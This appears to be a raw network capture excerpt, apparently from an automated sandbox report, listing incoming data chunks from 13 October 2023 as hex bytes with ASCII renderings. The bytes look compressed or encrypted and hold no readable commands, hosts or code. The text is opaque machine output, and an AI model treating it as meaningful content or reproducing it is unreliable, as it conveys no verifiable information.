2023-10-13 13:21:17 UTC	10830	IN	Data Raw: 86 5a d3 6a 47 89 fb 71 52 9a f8 8a e3 37 75 4c 25 b4 a9 95 49 9c 82 67 39 48 00 7c 5b 71 5e d5 bc 41 0d 86 04 24 c4 b4 98 52 1b 2e dc c9 7f 80 2c 37 e7 9a 43 09 e9 72 75 1c 7f 9e 61 ae d8 a8 61 f7 4e 49 1e 0d 4a ea 22 89 9c a5 4c 0b 14 ac d9 50 88 41 26 7d 62 97 95 ec 16 b7 48 3a 7f 1b bf 70 ef 83 05 c9 d7 0e e3 3c f5 94 72 6a b5 0a c2 4c 15 01 b3 b5 1e 47 c8 04 c3 c4 c5 29 fb bb 9e c5 cd 58 d7 d9 19 23 a4 a0 9c 4e 04 7d 27 c9 13 93 16 14 2c 5b 76 06 44 95 c1 d5 6d c9 55 d2 24 aa 0c 99 02 c7 c7 b6 f4 11 38 19 78 b7 9c 16 4d 3e 85 1c 45 92 97 55 a6 24 77 da 0f 2b 95 f6 cc 7a 5a 6c f7 1e e6 aa 0e 54 3f 56 dd c0 70 d2 7a 8f b7 15 a0 60 40 a4 a9 96 49 c2 da b5 a9 b0 31 e9 14 99 83 a2 e2 e7 da 9c 15 a1 be 85 d0 3e 13 79 14 5a 24 7f 5a 06 4a 57 12 f3 3d df 56 Data Ascii: ZjGqR7uL%Ig9H\|[q^A$R.,7CruaaNIJ"LPA&}bH:p<rjLG)X#N}',[vDmU$8xM>EU$w+zZlT?Vpz`@I1>yZ$ZJW=V
2023-10-13 13:21:17 UTC	10846	IN	Data Raw: 76 4c 56 c0 e0 35 9a b5 30 fa ca cd e7 f3 0f 38 f6 d0 fa 86 06 45 2d aa ef 36 a1 41 c3 73 db e2 72 1f dc 32 72 4c 95 aa de 59 54 49 f9 e5 ab f9 47 0d bf 2e 8b d1 04 2f 04 01 2e 60 29 44 ac 73 4e 17 4d 5e 1c 32 3b 6d 05 7d 43 30 25 9b 3b 3a 5e f2 81 e1 77 40 07 07 65 cb 60 08 1a 8f ef 28 26 8d c1 4b 82 ca ab 76 af 0e 8a d2 a4 1a 9f 0e 8a 2c 1c 9a 7b 5d 71 a0 38 21 8c 10 c0 c9 fe 62 16 94 f4 f0 33 cb cd f6 d1 ea 62 91 11 fa 27 1f a9 74 5d fc d6 1a f0 aa 6a 13 64 f6 38 ca 7a 96 f4 a9 f8 de c3 66 f2 2a cb 77 82 ae bb f7 38 ae 7d d4 99 66 b4 b1 e5 59 36 34 ff c2 1f 1e f5 99 f0 c9 87 92 ff e1 a4 be c1 b0 79 28 38 66 b7 7d 8e 5c 9a b1 a5 35 ab 75 47 60 69 0e 3d 39 5f 4c 04 3b cf 1a 15 d2 3e db 91 0a 9d f2 15 09 78 10 82 73 d1 a1 34 29 b1 35 b2 f5 9a 2b 28 24 cd Data Ascii: vLV508E-6Asr2rLYTIG./.`)DsNM^2;m}C0%;:^w@e`(&Kv,{]q8!b3b't]jd8zf*w8}fY64y(8f}\5uG`i=9_L;>xs4)5+($
2023-10-13 13:21:17 UTC	10862	IN	Data Raw: ca 28 c9 97 c6 32 ca 26 58 3c 5a 1e 37 e3 85 0d 62 c7 fc c3 49 2f c6 14 4a 80 20 71 07 f4 33 0c df cd 3f 55 a6 9d ea e2 cd 25 dd cb d6 b0 6f c2 08 d9 86 d0 d8 58 17 1f af 32 e4 c4 35 d0 b5 32 c2 91 1f e5 bc bc be 5e 13 87 de 6a fb fb da 1f d4 42 09 76 35 2a e3 58 4c c5 b2 b6 54 7f d1 17 f4 22 4f 23 a5 88 0e 3c 94 39 9d 72 41 0c 62 44 2b 95 79 f5 4e 7a ce 54 0b fd fd 9e 8b e0 aa c5 78 28 f2 f5 25 a9 4f b6 53 fb a9 e7 bf da 12 69 bc 19 88 17 47 b0 92 f4 47 27 a6 e7 8f 83 f7 a9 40 8e c7 4c 77 71 7f 04 f2 d3 90 2a 4b 40 55 32 6b 76 86 31 b0 05 6b 53 f5 8e 24 e7 3d a3 67 2f 0c a7 b9 32 b1 c4 40 10 b0 d2 27 d8 dd aa ec e5 2f 3d 4b 76 5e 25 a7 29 24 1a 49 eb 1c 18 bb 93 89 05 c9 f3 20 10 dd 2a 08 26 28 46 9e 36 05 fe 04 d6 69 4c 29 a1 ec 60 d4 10 2c 5b 64 8a 24 Data Ascii: (2&X<Z7bI/J q3?U%oX252^jBv5XLT"O#<9rAbD+yNzTx(%OSiGG'@LwqK@U2kv1kS$=g/2@'/=Kv^%)$I *&(F6iL)`,[d$
2023-10-13 13:21:17 UTC	10878	IN	Data Raw: 9d ee 56 f3 94 26 3a 4d 24 7d 70 ef 46 7d 85 fc 2e 11 4d ff 12 a5 cf 6d 54 ee e3 90 8f 61 d1 72 e7 26 a8 bc eb 1a 47 18 ab 7e 51 33 d3 b3 67 83 cc be 93 9e 5a fc f3 11 12 0d 03 01 56 12 7f f0 f0 75 76 e9 30 c1 45 4a 6f e3 42 42 75 a1 4e 9c 11 d9 1b 0f ff 83 60 6b 6a 99 ac f5 55 c1 dc 30 7c d5 a0 d4 cd 08 64 64 8e d3 8d 9c 76 fa ea ba ee b0 f7 b9 81 02 11 c1 b8 2c c6 01 e4 77 35 89 be d5 75 2a c2 0a fa 4d 92 54 95 19 3a 53 88 94 da 56 d6 8b d2 57 ab af de a9 3f 7e 14 ae 20 b8 ca 2d 4f fb b0 d7 f1 a4 be 88 c5 ac 19 78 f7 70 dc d4 d3 ac 7b fa 63 13 2d 6f f6 3f 08 fd cb 9d ca 80 29 f7 a8 5a 02 12 fa cf a7 b2 95 c0 dd 9b 87 a5 87 ae 80 49 6c 67 7a 67 22 73 d8 7e 17 6e db 4a c5 56 f2 33 e9 cc c5 36 91 e5 04 c6 5a 00 2e 9e df 8f 8a fc d0 45 13 d1 4a f0 9e 90 3e Data Ascii: V&:M$}pF}.MmTar&G~Q3gZVuv0EJoBBuN`kjU0\|ddv,w5u*MT:SVW?~ -Oxp{c-o?)ZIlgzg"s~nJV36Z.EJ>
2023-10-13 13:21:17 UTC	10894	IN	Data Raw: a3 f4 b7 16 7d 2a 03 7f 98 38 6d 12 2d b6 5e 84 fa 91 2d 4f ba d5 7e e8 51 9e ac a5 9f 63 2e 80 99 7e dd 0d 57 1f 9c cd b6 73 c2 30 53 48 41 a4 a9 18 99 28 21 c4 fa 80 dd 67 ca b5 30 63 a1 e7 92 ce 65 8a 2e b2 07 f6 ea 10 a7 1a 05 d5 37 af 2e 4b 41 55 73 16 c3 73 dc 72 15 aa 2d a1 64 4c e3 8b 5f c8 0f a7 c8 2e 90 00 6d 4f a3 49 4a 53 10 15 84 37 f3 57 56 3e 8c 38 4a 38 8e 32 d7 83 ad 9d 33 f3 2b b1 39 76 0f a8 b1 46 7e 4e 2f d5 5f 44 c4 e5 0f 25 40 be bc 22 39 c3 6b d8 60 fa 2d d6 e3 df 0b 50 2f 07 05 46 7a 5b fa 67 da b9 93 38 c8 2e c3 14 cd de b8 6b 0b 6c 82 34 ac 67 68 8c 91 07 cd 1f 35 ca 56 03 64 2a 1d ac f2 1c e2 18 27 c2 59 91 94 cf 8b fc ae 65 e4 ad e8 76 2c cf eb c8 31 60 65 26 70 13 05 b3 64 1b a5 e7 49 52 43 0d 20 b9 75 3b f5 6f 4c 57 c8 56 ce Data Ascii: }8m-^-O~Qc.~Ws0SHA(!g0ce.7.KAUssr-dL_.mOIJS7WV>8J823+9vF~N/_D%@"9k`-P/Fz[g8.kl4gh5Vd'Yev,1`e&pdIRC u;oLWV
2023-10-13 13:21:17 UTC	10910	IN	Data Raw: 89 a3 07 b5 9a 6a 17 fe 98 e7 83 2e da a5 bc ec 8d af 8f 0c ab 7c b7 f3 a1 4f 5c 0c 7c 4d ce 45 e7 f9 1a 97 a0 c3 31 ac a9 cb b3 6a 99 1f 66 15 5f f0 b2 92 48 8d da a0 d9 ed d2 42 07 58 20 af 21 82 67 61 e1 23 25 74 9f eb bb 70 52 70 0c d5 50 bc b7 01 9e 05 63 9b 8e 32 d3 de 2b ba 08 a1 82 7c b6 fe ab de 30 23 c2 3c b4 b1 5b 0e 4c dd b2 10 3b 21 61 c2 f5 e8 43 bb 85 2d 8a 8b bb 20 f9 97 ef c2 9c 9f f6 63 80 22 3e cb 2e f5 87 a3 76 e7 39 39 7e a5 82 93 91 fc 0b 74 e7 e7 67 e3 2d 4e 26 61 3b 2f 23 d4 ac 00 40 02 e6 13 a3 06 00 9a 62 54 df a5 42 68 28 00 a2 73 a1 4e 0d 0c 3c b6 3c ea e2 64 4e bd 39 7e 95 76 50 52 d4 a6 0a 46 f0 72 15 f1 70 cf 89 bd e0 d1 73 75 70 4b 24 3a 1e 71 8a 51 d6 47 90 32 2b 92 cc 8c a0 d8 8e 09 05 cd dd 43 18 ac db 89 b7 32 b6 71 b5 Data Ascii: j.\|O\\|ME1jf_HBX !ga#%tpRpPc2+\|0#<[L;!aC- c">.v99~tg-N&a;/#@bTBh(sN<<dN9~vPRFrpsupK$:qQG2+C2q
2023-10-13 13:21:17 UTC	10926	IN	Data Raw: 5d b4 87 b4 f0 68 62 22 48 1c b1 1b 92 22 91 e9 7f 39 3d 92 0b 73 f9 49 a8 1c 93 81 23 b9 de ce 81 bc fc 0b a1 c3 7f 52 72 8d 07 4d 72 bb 55 b1 c9 db 60 3e 62 b1 f1 5d ca 28 11 36 34 28 83 fc c6 4d 01 6e 38 48 6f 66 9f 64 ee 33 45 9b b0 ee 1c 3b 2a a3 3a 72 1e 2c ac 2e 3b 17 4b 0b 1d e3 d0 1e 3e f5 34 55 f8 ec 8a 9f 01 be 18 72 96 46 03 43 aa b5 94 16 26 ea 60 db d1 8f 86 8a 2e af 63 49 b6 69 19 14 37 03 eb 76 81 2f 14 75 50 6f 2d dd 4d 93 06 7c cb 9c 9b ce 04 0a dd a5 52 29 7c f0 ee 4a cb 6f 35 c4 8a 14 6d c1 61 4c 00 af 83 61 97 21 09 14 b6 c8 2c 7f db 8f 3a e2 63 3c 89 fd 38 db 26 03 0c 5d a2 66 43 cb 06 5e 1b ac 4c a4 ba cb 1c 6e 9a fd 3c c0 df 25 9c a5 d7 ce aa 04 08 a6 a5 bc 5f 62 4f c9 ac e9 c3 33 ad 76 6f f0 3b 93 f8 ed b5 db e3 65 d8 a0 84 35 df Data Ascii: ]hb"H"9=sI#RrMrU`>b](64(Mn8Hofd3E;*:r,.;K>4UrFC&`.cIi7v/uPo-M\|R)\|Jo5maLa!,:c<8&]fC^Ln<%_bO3vo;e5
2023-10-13 13:21:17 UTC	10942	IN	Data Raw: 37 d7 2c 32 32 67 e1 40 59 b5 2d 17 9e 66 75 0a d5 59 47 54 0b a9 be 03 f4 9b 9e a9 7b bd 28 e8 06 64 d6 b2 1e 6d 9f 81 09 c0 87 85 c3 d4 2a 79 94 e1 af 86 9e ee 80 65 aa 79 cf ac 7b cf d9 61 16 85 7a b2 96 e9 13 67 20 f0 fc 21 d2 f1 b2 e6 da 38 5f 42 6e 85 4d d0 5b a7 e5 4b c8 e9 7d 6b 60 fa 7a 56 2d 06 c0 3f 17 4a 03 09 e7 bf d3 8a 09 0e ba fd 25 77 b9 0e 2c 12 95 55 23 81 85 4e f0 45 b4 1b 09 d8 7f 2c 1e 47 3a b6 ac 58 ae 23 d0 92 a0 07 ca c6 8a 96 19 84 30 fd cf f6 a6 c8 74 1c 31 81 74 ca 55 13 a3 e0 f7 91 54 ff 11 78 a1 40 40 94 02 2e d1 ad 2b d4 6e b3 31 2a 8a 04 4a e2 29 e6 e2 4a fc 23 7b 6f d6 bc 85 74 0d af d9 5f 1c cd 54 98 eb 35 4b 99 f3 bb 50 cc ba 58 1b 01 bd d2 69 07 36 cd 3a 8e e3 ef a9 14 d4 9c 14 ba 7f 4c 79 52 37 46 2f ba 33 6a e8 c5 c5 Data Ascii: 7,22g@Y-fuYGT{(dmyey{azg !8_BnM[K}k`zV-?J%w,U#NE,G:X#0t1tUTx@@.+n1J)J#{ot_T5KPXi6:LyR7F/3j
2023-10-13 13:21:17 UTC	10958	IN	Data Raw: 26 aa 1a 60 97 67 cc 77 47 b4 01 8f 4e f0 87 79 f8 e7 d5 b0 3c 5f eb 9e c0 34 a5 42 33 48 ae 88 fa f1 81 3e 8a dc 8b ed b1 6c 6e ba a3 de 83 c2 d2 a0 f9 33 88 ef 5f da fb e0 89 89 94 55 22 4d 6a b7 01 c9 4a 79 ef 32 a5 8a 83 81 09 3b f3 67 2e c6 c4 17 e3 27 32 17 2a 99 02 96 02 11 be 9b 69 ed e2 99 51 43 55 80 d3 5d a9 2e ec 2b 19 b3 68 da c5 5f d5 4d 89 a6 23 d8 a4 1b 51 52 57 ec 4a 54 d3 91 cb cc 4a 2b d5 d6 e9 11 aa 10 f2 3d 30 63 4b 33 c0 c2 a4 44 4a 19 a9 05 14 66 33 7f 13 55 f1 95 86 6d 29 cf a3 2f 99 73 37 5d 33 85 6d 97 32 36 b1 46 75 61 27 ee 29 34 52 0a 51 36 f7 51 7b c1 a6 c6 c1 cb 93 b3 49 44 7f 32 e7 d8 8c d3 21 60 a1 79 ca 1e c9 1b 93 34 ad f3 cd b1 57 f9 88 91 9d 83 ef 0b d0 b2 fa ed b2 d6 10 8d 99 2f c5 56 1c 9c 32 ab e5 94 ac 93 ba 53 1e Data Ascii: &`gwGNy<_4B3H>ln3_U"MjJy2;g.'2*iQCU].+h_M#QRWJTJ+=0cK3DJf3Um)/s7]3m26Fua')4RQ6Q{ID2!`y4W/V2S
2023-10-13 13:21:17 UTC	10974	IN	Data Raw: 8b ee fa 8d 7b 6c 13 2e 33 50 e5 7b 24 da 36 71 ff 24 c8 64 9c 39 89 b7 75 f9 e0 e3 75 22 f9 5e 9a 17 1d bf 7f b9 98 e8 8a 4d 2b d4 6c 21 b7 6b 70 c7 86 3e d8 e1 20 f4 5c eb 19 cf 7a 98 be 0e 5d 2c 31 86 a5 48 57 41 7d 40 ae 57 d2 bc f0 bd 90 0c 0b f7 25 53 6a ba 1b 83 3c a7 0a ef 23 3e 5b 6e 94 b1 7a a0 2a 89 5a 08 a2 25 1a 9a 48 f2 70 10 8d 29 9f 04 f5 2f 47 4a 57 d3 e3 39 4b 92 be 86 92 68 91 10 db 10 8f eb d3 cb a6 c1 6a cf 1d b4 06 54 7c 6f c3 64 c4 6d 3b 96 5c f1 4e 67 35 2f be 1e ab 58 46 9b d0 b8 c2 6c 98 93 3c f9 fa 8b d0 5d 19 a1 a2 ec 81 b2 55 60 01 73 c9 ff 32 19 64 15 94 9d 7f a0 8f 04 57 a3 42 e6 8c 6d c7 68 b8 40 78 89 14 25 b0 25 df c4 c9 26 51 40 2d 91 86 bb 2d 0b d7 1d 77 87 c7 cd 2f 94 13 e6 6f f3 30 8f 16 34 c7 43 d4 84 13 15 fc 5c a6 Data Ascii: {l.3P{$6q$d9uu"^M+l!kp> \z],1HWA}@W%Sj<#>[nz*Z%Hp)/GJW9KhjT\|odm;\Ng5/XFl<]U`s2dWBmh@x%%&Q@--w/o04C\
2023-10-13 13:21:17 UTC	10990	IN	Data Raw: 6c cd b9 be d3 71 c9 2f 8b 63 a1 18 8d b6 10 81 2c b6 a5 91 10 4f b9 1c 17 f0 a2 41 46 79 af fa 08 b2 4d 5a dd 67 7c 37 6e d3 ef 6f 75 6c 3b 69 81 64 80 5f f9 a9 c0 6a ec a6 0e 39 eb 2b 50 4b 67 6a 48 be 43 58 bd 35 85 2e d6 7c 02 99 9d e2 27 32 e0 8a 13 0a 45 b8 34 a3 77 73 87 0b c7 ef 34 38 4e bd 88 e8 be 44 45 d7 20 ef 99 32 d7 3f 29 28 94 b4 fb 6b 8a 1a 43 01 da 5d 65 93 c1 e4 f7 df 18 88 b2 0d 92 32 cc 0d 14 2c 6b 79 70 26 f1 4a 92 78 5b a1 d3 43 04 62 54 ae f9 23 ee 91 7a ba a5 4c 92 fa ba 16 37 61 19 70 ef b6 9d 49 6d 85 53 5b 01 27 3c f4 01 01 fe e5 b6 ab fb 4a 87 7c e6 86 23 ee c5 e8 2c d9 9e 99 a0 92 87 85 e3 77 10 7c ec 9f 2f 4f b2 b3 74 bf ba 7c a5 89 fc 99 4e c9 b9 cd cf fd 64 90 54 98 b1 1e c5 cd e3 fd 6e 10 86 7e fe 6f c4 64 a8 87 d5 fd e3 Data Ascii: lq/c,OAFyMZg\|7noul;id_j9+PKgjHCX5.\|'2E4ws48NDE 2?)(kC]e2,kyp&Jx[CbT#zL7apImS['<J\|#,w\|/Ot\|NdTn~od
2023-10-13 13:21:17 UTC	11006	IN	Data Raw: f9 07 8f 1b a3 21 85 58 55 2d a6 f8 2e bf 17 b5 f5 b9 5b 4c 79 5b bf ae 4e a6 31 0c e3 92 a1 91 30 7d 14 cc 54 12 2a a1 66 96 89 43 83 60 22 6c fc 47 09 b9 10 69 46 52 37 e2 87 02 74 48 5f 44 2d ed bf e1 fc ca db 29 7a 81 cc ac 24 e9 11 21 dd e2 bd 8c 52 0f ed 8f ba 6b a2 af 4f 81 3a 5c 50 85 8d 78 d9 b4 64 41 ec 1e 4e 98 ab 1f 2a 29 67 c0 62 df 95 94 a9 8c 93 87 bb aa 24 38 71 c3 2b 52 1e c3 bd 32 d7 b7 a9 20 b6 d9 d8 2c 8a 9e 20 6a 93 dd 75 49 7f 16 e6 6a 21 71 17 4c 39 31 84 09 a8 cf 35 cb 92 9d 94 92 01 c5 e3 7d e0 8f 73 6e 64 c0 a8 4e 47 ff 62 b9 a4 cf f5 67 14 89 15 78 ac 4f 63 e7 4f df d0 b9 60 7a f7 c3 3b 3a fb 64 3e 96 63 75 49 c7 06 3f a2 da 47 68 56 6f 7a 8d 1d ea d3 28 35 dd 96 20 7a bb 9f 52 ed 71 5e 9e 2f 08 43 7c 3c 11 3d 3b 42 ea d0 0a c1 Data Ascii: !XU-.[Ly[N10}TfC`"lGiFR7tH_D-)z$!RkO:\PxdAN)gb$8q+R2 , juIj!qL915}sndNGbgxOcO`z;:d>cuI?GhVoz(5 zRq^/C\|<=;B
2023-10-13 13:21:17 UTC	11022	IN	Data Raw: 1d 12 a0 dc 6e 3d 5c 8d bf 66 bc a2 1d 90 4b 7a c4 3d 5b 36 88 6f 67 c4 15 9b 43 a2 c1 17 c5 73 5f 8f 62 7a b6 54 cf 92 7d ec 34 06 05 4f 2d 0a b8 ba a6 09 ad 6d 3d a6 63 aa 03 a0 a9 23 36 5e cf 69 ba ca db 61 cb 9c 83 dc 12 07 a7 04 34 cd a7 62 dd f5 fd 9c 0c 87 81 56 a7 55 ba cf ce 66 d4 4e ae cc 7d 7d 4a 58 c9 b4 c3 17 0c 01 06 69 c1 f2 bb 2f 56 43 9a 2a 58 e4 d3 43 96 b0 a5 e2 1f b3 87 7b f1 7b 2d 82 55 db 98 e8 03 7f 25 f7 55 77 60 56 78 44 5d 16 76 4a cb 29 32 6b a6 48 b9 86 6a b9 95 99 96 84 d4 cb c4 7c d1 cb a6 24 06 55 42 fc b1 e4 e7 31 ed 0a 59 c8 1d 3a 20 f9 b7 8e 85 27 ea ab e7 2b e8 91 c6 2f b9 aa 15 aa 05 3d f8 17 33 29 be 17 ac 67 bb b4 89 ac 5d 52 91 af 9d 2d c6 fd 8b 51 c1 d6 02 23 ca fc d5 bf 6b 36 44 5a c9 ec c6 0f 4d 2e e9 33 09 dd 84 Data Ascii: n=\fKz=[6ogCs_bzT}4O-m=c#6^ia4bVUfN}}JXi/VC*XC{{-U%Uw`VxD]vJ)2kHj\|$UB1Y: '+/=3)g]R-Q#k6DZM.3
2023-10-13 13:21:17 UTC	11038	IN	Data Raw: 85 87 a8 d0 b0 9e 2b aa a6 57 3d 97 56 52 8e b6 15 a4 01 8e d3 0c b2 4a d3 4f a5 a8 f0 49 2b d2 f8 e5 d4 04 e3 b0 f5 eb ce ca b0 8c 1a b5 ab a4 f7 1a 36 2a 8c 32 1d d3 e3 14 8e 1b 4f f0 51 e9 69 bc 4b c3 7b f9 73 ef 51 37 0a d3 61 37 de b4 df 10 62 c7 f9 5d ee 7c d4 76 81 b0 76 e1 68 60 56 4d 2b b3 94 72 28 82 9c 28 67 7b 55 96 14 ea 3c 3e eb eb c7 a3 34 9a eb 5f ce 0d 93 8f 6d 0d 96 49 1a d8 74 77 43 a2 0e 8f 4b ca 9d c9 90 ff e5 48 69 13 1e 81 3a 10 4e 7a aa a4 f3 df 0e 48 37 75 5f 8a 19 02 d8 b2 18 69 0a b9 ac 07 cc 55 f0 45 1e c2 c5 6d b5 d6 8e 4e 49 25 b4 86 c6 14 36 34 fd 11 1a 5d 1a 36 b2 30 38 a3 25 9a 21 d1 2c 36 7e a0 6f bf d0 ad c2 01 8b a4 fd 5c 2a 1e 3d e9 1c 93 89 9c bd e8 e0 ae 90 67 5e 82 16 65 8a 74 b1 c4 01 ef 7f 4b 78 49 dc 83 fc 21 67 Data Ascii: +W=VRJOI+62OQiK{sQ7a7b]\|vvh`VM+r((g{U<>4_mItwCKHi:NzH7u_iUEmNI%64]608%!,6~o\=g^etKxI!g
2023-10-13 13:21:17 UTC	11054	IN	Data Raw: 80 36 12 88 39 18 4a 06 3f 7c cc 2b 39 6a 98 fa d5 fe 7e 3d 87 c3 a0 e7 0c 78 ff 6b ee e4 b7 3b 0b 03 47 db b5 d7 ef 92 8f e8 03 3d c4 fe f5 ba 9e b2 4a e2 77 bb 12 70 71 3c 77 6e d5 7b bb 53 b3 05 b4 4e 8a 68 0b 41 4c 55 99 61 ae 6e 33 e1 f1 bf 05 18 8c ae dc 3c 93 e1 e1 71 fa ad 8d 83 7b 2e 3c 06 62 2d 28 70 50 79 b2 0d 4a 47 70 e6 1b 2b b8 80 f3 d1 23 d7 61 c5 d4 ef 75 b5 1a 77 4d 28 12 10 87 f9 bb f6 90 46 14 de e5 de a9 4f 15 ce ba a8 7c 63 eb ca a1 1c f1 46 ee 47 73 73 8e 43 89 55 ca c9 3b fb b7 9c aa 95 9b 7c b0 8f 40 28 6c 97 58 aa ca 3b 76 b8 04 7d 5c 86 47 9e 23 eb d2 5d b6 9f 51 8e 68 6a ba 5a 75 01 db a0 6b 00 89 2c 59 60 5c 1b b5 49 f2 43 62 6f 12 48 02 60 ca 8a c9 4b ca c0 0c 44 7b cd 82 c3 a3 af 04 c3 f5 12 e0 c3 31 88 0b 28 06 e4 3a 53 9b Data Ascii: 69J?\|+9j~=xk;G=Jwpq<wn{SNhALUan3<q{.<b-(pPyJGp+#auwM(FO\|cFGssCU;\|@(lX;v}\G#]QhjZuk,Y`\ICboH`KD{1(:S
2023-10-13 13:21:17 UTC	11070	IN	Data Raw: fe 81 71 b2 53 ac 2f 84 c8 66 3e 0e ff b4 fb 6a 67 95 27 d8 11 90 ad 89 c0 c6 c6 12 86 94 2f 82 4b d3 f0 fc 64 ec a5 d1 f9 60 ee 37 56 ac 37 22 e6 92 50 7a 5e d8 ce c9 1f b2 35 b8 0b d7 50 87 a5 32 a1 5f 89 ae 96 65 d3 e1 10 bc 81 99 db ed 19 e9 15 fe 07 e8 36 ad 7d e1 1a 7d 2f f6 62 d7 56 dc a5 cc e7 6c a8 00 ef 9c b6 79 a5 64 b1 67 c0 5a b2 f6 e3 b7 f9 c2 5d 3c 08 bd a4 3a ff ba ce cd 06 41 c4 1b 08 30 91 d5 48 3f 5b 38 f4 1b 70 94 92 a1 78 eb 01 08 6d 27 67 be 6c 45 19 f2 57 bb df e3 15 fb 31 96 65 56 96 67 66 07 a4 50 07 5a e4 f8 a6 bd bb f3 88 a1 fe 75 79 20 4b 9f 87 35 fe eb d1 fc 2a ed b9 7d 3f fd e0 49 b3 64 26 02 47 9f 69 1c ee 6b 4e ae cf 8e bc ef 62 fc c2 bd 6b c7 09 72 93 24 a2 b3 3c 95 8b 3c 46 84 e9 fe 69 80 f5 76 ec 73 75 4d 63 04 c2 99 24 Data Ascii: qS/f>jg'/Kd`7V7"Pz^5P2_e6}}/bVlydgZ]<:A0H?[8pxm'glEW1eVgfPZuy K5*}?Id&GikNbkr$<<FivsuMc$
2023-10-13 13:21:17 UTC	11086	IN	Data Raw: 89 c5 36 d5 c1 fe 99 3d cc fb 76 0e 9c d1 66 92 e8 5f 61 ea 77 22 5a ba cd ba 9a 20 9b e1 f7 db 10 c2 f2 a8 53 0d ed bb 99 0a 15 23 75 88 0e 0a d3 90 a7 2f d3 cf 8e 50 6e c3 d6 71 d4 76 a7 32 d4 0f 1c 77 79 d6 5c b7 fd 23 64 b1 10 6b c5 43 a6 51 91 d5 1b 29 7b 22 36 c4 e7 0c ce 3b 71 82 10 d8 e4 41 70 01 fa d3 6c 7c 64 c6 1c 80 c0 3a 7c a7 f1 be c4 6c 9a c9 82 ae 53 91 13 77 69 07 86 87 a1 1b 26 f0 c3 2f 14 0f 61 7c ca 67 28 c0 ec 03 96 4b 43 6c 31 fb df 45 a4 0f f8 d7 1a f1 af eb a9 5a d6 51 b9 1d 65 96 12 07 31 9d a7 4b e9 ff 46 a2 a3 c8 96 9a 2c 99 2d 0e 78 9b be da 9a e9 87 98 34 70 70 2b 90 d8 25 93 8c 1a 81 cc 6a 55 7c 14 50 1d 03 1e d9 d2 ad de 9d 97 72 9a a7 8b 3f 2c bf a6 b2 d3 fa 43 bd 87 bd 19 87 49 4d 4c 91 7f 41 79 e6 e0 73 59 33 eb 35 09 96 Data Ascii: 6=vf_aw"Z S#u/Pnqv2wy\#dkCQ){"6;qApl\|d:\|lSwi&/a\|g(KCl1EZQe1KF,-x4pp+%jU\|Pr?,CIMLAysY35
2023-10-13 13:21:17 UTC	11102	IN	Data Raw: 35 f1 c3 0b 18 02 e4 93 3e ec d1 24 03 8d f8 0f 7f 5e e5 b2 2b 3f ff c5 c8 f2 ae 90 a8 5e eb d1 8e 12 15 53 b9 8e ce b2 81 e2 dd 26 e8 69 32 a0 73 dd 71 df 9f 9b 09 38 c2 5b b0 09 7a 60 96 2d 24 14 65 fb fd e4 b6 6e 86 84 bc 30 00 63 9e 4e 70 b1 35 a8 c4 4c 11 2e 09 83 02 2f 02 50 dc 47 f7 c5 35 4b 51 5d ca 52 fe e1 d1 1b b8 06 19 c9 11 a4 b0 ae 52 d8 0c 5f be cf 5d 41 3a b8 98 d0 00 f2 30 64 15 2d 3e 5e 90 9d 40 42 f9 80 da 4f 90 a2 91 54 de 92 e8 39 80 6e f1 96 ef f0 7b 28 50 e9 ed 19 ca 9c bc d8 2e d9 de f0 a2 43 79 41 66 f1 b0 83 c0 d4 0e e9 cf 2f f6 d2 b5 9c 10 3b 0b 21 d2 d9 35 af 87 84 a3 eb 4c 6e c1 9f 9d 56 a0 12 ff 35 d8 30 a9 e3 11 d2 2e 6e e3 bf b3 7b 21 c1 78 d6 57 5e ec 72 c1 2d c8 30 34 63 0c 5c 0f 9e 1a 0a 81 dc 23 85 5d 14 42 3e d8 9b c9 Data Ascii: 5>$^+?^S&i2sq8[z`-$en0cNp5L./PG5KQ]RR_]A:0d->^@BOT9n{(P.CyAf/;!5LnV50.n{!xW^r-04c\#]B>
2023-10-13 13:21:17 UTC	11118	IN	Data Raw: d0 97 00 8e 8b e5 d1 f8 3e ff 5e a1 f5 03 c9 0d 03 73 4a 8b dd 6b b6 c9 c3 9f 85 66 bd a9 09 86 c4 ca 92 0c cd d5 f3 42 32 ee 14 cf 27 32 5e a1 9a 68 dd 78 e1 2b f9 ca 31 11 33 13 7a 15 3b fc f7 c8 b5 aa 59 4d 34 3c 88 bb be a7 e9 04 ee 55 b5 e1 17 6b 55 d8 e0 cd cd 46 8c ba 18 c2 45 81 22 a8 c5 5e 23 45 42 ca 48 dd 82 a3 05 e8 dc 1d 90 c4 f0 e7 cd 1a 11 72 7b d3 81 2f ce 17 23 8c 6b cd be b0 fb fd 7a 80 f0 4b f1 e3 54 bb 09 20 f1 77 b9 43 38 70 34 44 91 88 17 9c 97 a1 f9 dd 8e 0f 45 c1 b1 f9 3b 51 cd ec 34 f9 69 5a c7 e6 4b 20 22 92 68 c3 e8 f0 84 45 d7 39 f1 c4 59 90 cb c2 93 3b e7 04 98 fd 75 2d 99 fc 1c a9 28 bd 2f d3 99 f7 37 cc 02 fc 9f 0f b1 80 d5 27 7c 92 23 36 e8 91 47 e6 ef 73 2c 7e cf f9 9f 1c fc 52 ad c7 90 8c a8 74 f5 f1 d9 fd 1c 34 cf e9 f3 Data Ascii: >^sJkfB2'2^hx+13z;YM4<UkUFE"^#EBHr{/#kzKT wC8p4DE;Q4iZK "hE9Y;u-(/7'\|#6Gs,~Rt4
2023-10-13 13:21:17 UTC	11134	IN	Data Raw: 11 77 7d df c0 1d ed a7 4d de 6e 49 52 38 64 b6 2f cc ce 5c cb aa 4e d7 23 06 aa c3 f9 7f df ff 1c 05 3e 1b 6b 0e ee 97 f5 bd d0 49 15 6c fe 59 49 b5 f3 a5 45 a8 5b d1 be 95 bd 7a 45 15 98 47 60 8c e9 e2 ef 15 59 e4 d0 41 d9 12 5b f6 48 c5 76 8e 0f 5a b0 59 73 9a af 01 1d f4 ad 27 59 07 d0 96 b7 e3 3c 70 0e ba 92 08 92 22 39 22 b8 c9 7d fd b0 42 05 0f 04 d4 d7 44 8e 1d f4 6f d6 f9 74 38 1c 60 43 7f 5f 40 98 d4 1b 39 a1 0c 01 3b c7 75 36 a8 23 9f 2f 9b 0a 3a 00 b2 12 b7 ac 84 53 f4 63 7b ed 19 77 42 df ef dc a5 00 11 cf cf a3 5a 27 ea 65 b1 48 42 c8 7c 41 2b fe 39 fa a6 6f 97 62 45 66 f4 8a e1 11 31 11 8d 9d 20 28 9b db c7 6b 90 52 68 96 3b 99 7b a5 13 4b 9a 23 33 ac 6e af a5 01 2f 93 9b 82 1f ea ac 8d a3 98 49 ed d3 c9 93 04 78 02 22 8e 6d e0 6e b3 37 da Data Ascii: 